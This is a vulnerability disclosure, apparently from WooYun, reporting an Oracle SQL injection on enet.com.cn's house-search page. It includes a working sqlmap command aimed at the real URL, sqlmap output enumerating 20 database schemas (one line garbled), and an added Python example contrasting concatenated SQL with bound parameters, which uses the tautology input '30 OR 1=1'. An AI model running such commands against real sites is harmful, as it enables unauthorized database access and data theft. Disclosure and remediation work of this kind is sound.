Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0177271

Title: 硅谷动力 main site Oracle injection (20 databases)

Vendor: enet.com.cn

Author: 路人甲

Submitted: 2016-02-21 09:35

Fix time: 2016-02-26 09:40

Disclosed: 2016-02-26 09:40

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-02-21: details sent to the vendor, awaiting vendor handling
2016-02-26: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

硅谷动力 main site POST injection (20 databases)

Details:

python sqlmap.py -u "http://www.enet.com.cn/house/housesearch.jsp" --data "district=79&housename=54&top_aprice=30"

Proof:

[15:10:14] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[15:10:14] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:10:14] [INFO] fetching database (schema) names
[15:10:14] [INFO] fetching number of databases
[15:10:14] [INFO] resumed: 20
[15:10:14] [INFO] resumed: ADV
[15:10:14] [INFO] resumed: ARTICLE_COMMENT
[15:10:14] [INFO] resumed: B2B_ADMIN
[15:10:14] [INFO] resumed: DBSNMP
[15:10:14] [INFO] resumed: EKA
[15:10:14] [INFO] resumed: FASHION
[15:10:14] [INFO] resumed: FILTER_ADMIN
[15:10:14] [INFO] resumed: ŰDy"\t\x07\x05\x05\x06LG\r
[15:10:14] [INFO] resumed: IFLOW_ADMIN"
[15:10:14] [INFO] resumed: IFLOW_ENEWS
[15:10:14] [INFO] resumed: OUTLN
[15:10:14] [INFO] resumed: PASS
[15:10:14] [INFO] resumed: PDB_ADMIN
[15:10:14] [INFO] resumed: ROBOT
[15:10:14] [INFO] resumed: SHOW
[15:10:14] [INFO] resumed: SYS
[15:10:14] [INFO] resumed: SYSTEM
[15:10:14] [INFO] resumed: TSMSYS
[15:10:14] [INFO] resumed: WMSYS
[15:10:14] [INFO] resumed: XPDB_ADMIN
available databases [20]:
[*] "IFLOW_ADMIN"
[*] "SHOW"
"*] "ŰDY" LG
[*] ADV
[*] ARTICLE_COMMENT
[*] B2B_ADMIN
[*] DBSNMP
[*] EKA
[*] FASHION
[*] FILTER_ADMIN
[*] IFLOW_ENEWS
[*] OUTLN
[*] PASS
[*] PDB_ADMIN
[*] ROBOT
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XPDB_ADMIN

Remediation:

Filtering

Copyright notice: please credit 路人甲@乌云 when reposting
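The report's one-word fix is filtering. As an added example (not from the report and not enet.com.cn's code), the block below puts the two patterns side by side for a search handler like the one in the POST body: one that splices the request parameters into the SQL text, and one that allow-list validates them as integers and passes them as bind parameters. sqlite3 stands in for Oracle (the binding idea is identical; Oracle drivers use :1/:name placeholders), the house table and its rows are constructed sample data, and the parameter names district and top_aprice are taken from the report's request.

```python
"""
Added example, not part of the original report or of the site's code.
Contrasts string-concatenated SQL with validated, bound parameters.
sqlite3 stands in for Oracle; the table and rows are constructed sample data.
"""
import sqlite3

# Constructed sample data standing in for the site's listing table.
HOUSES = [
    (1, 79, "Garden Court", 25),
    (2, 79, "Lakeside", 45),
    (3, 80, "Hilltop", 28),
]


def make_db():
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE house (id INTEGER, district INTEGER, name TEXT, price INTEGER)"
    )
    conn.executemany("INSERT INTO house VALUES (?, ?, ?, ?)", HOUSES)
    return conn


def search_concat(conn, district, top_aprice):
    """Vulnerable pattern: request values are pasted into the SQL text, so a
    value containing SQL syntax changes the structure of the query instead of
    being compared as data."""
    sql = (
        "SELECT id FROM house WHERE district = " + district
        + " AND price <= " + top_aprice + " ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql)]


def parse_int_param(value, name):
    """Allow-list validation: these search fields are numeric, so anything
    that is not a plain ASCII decimal integer is rejected before any SQL
    is built. This is the 'filtering' the report asks for, made precise."""
    if not isinstance(value, str) or not (value.isascii() and value.isdigit()):
        raise ValueError(f"{name}: expected a decimal integer")
    return int(value)


def search_bound(conn, district, top_aprice):
    """Hardened pattern: validate, then hand the values to the driver as bind
    parameters. They travel separately from the SQL text, so even if the
    validation were loosened they could never be parsed as SQL."""
    d = parse_int_param(district, "district")
    p = parse_int_param(top_aprice, "top_aprice")
    sql = "SELECT id FROM house WHERE district = ? AND price <= ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (d, p))]


if __name__ == "__main__":
    db = make_db()
    print("concat, normal input :", search_concat(db, "79", "30"))
    # The same tautology that automated scanners try: the concatenated query
    # returns every row because the appended clause rewrites the WHERE logic.
    print("concat, crafted input:", search_concat(db, "79", "30 OR 1=1"))
    print("bound,  normal input :", search_bound(db, "79", "30"))
    try:
        search_bound(db, "79", "30 OR 1=1")
    except ValueError as exc:
        print("bound,  crafted input: rejected ->", exc)
```

Validation and binding are layered on purpose: validation stops malformed input at the edge and gives a clean error, while binding guarantees the database never interprets a parameter as SQL even for fields that legitimately accept free text such as housename.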


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2016-02-26 09:40

Vendor comment:

Vulnerability rank: 15 (WooYun assessment)

Latest status:

None yet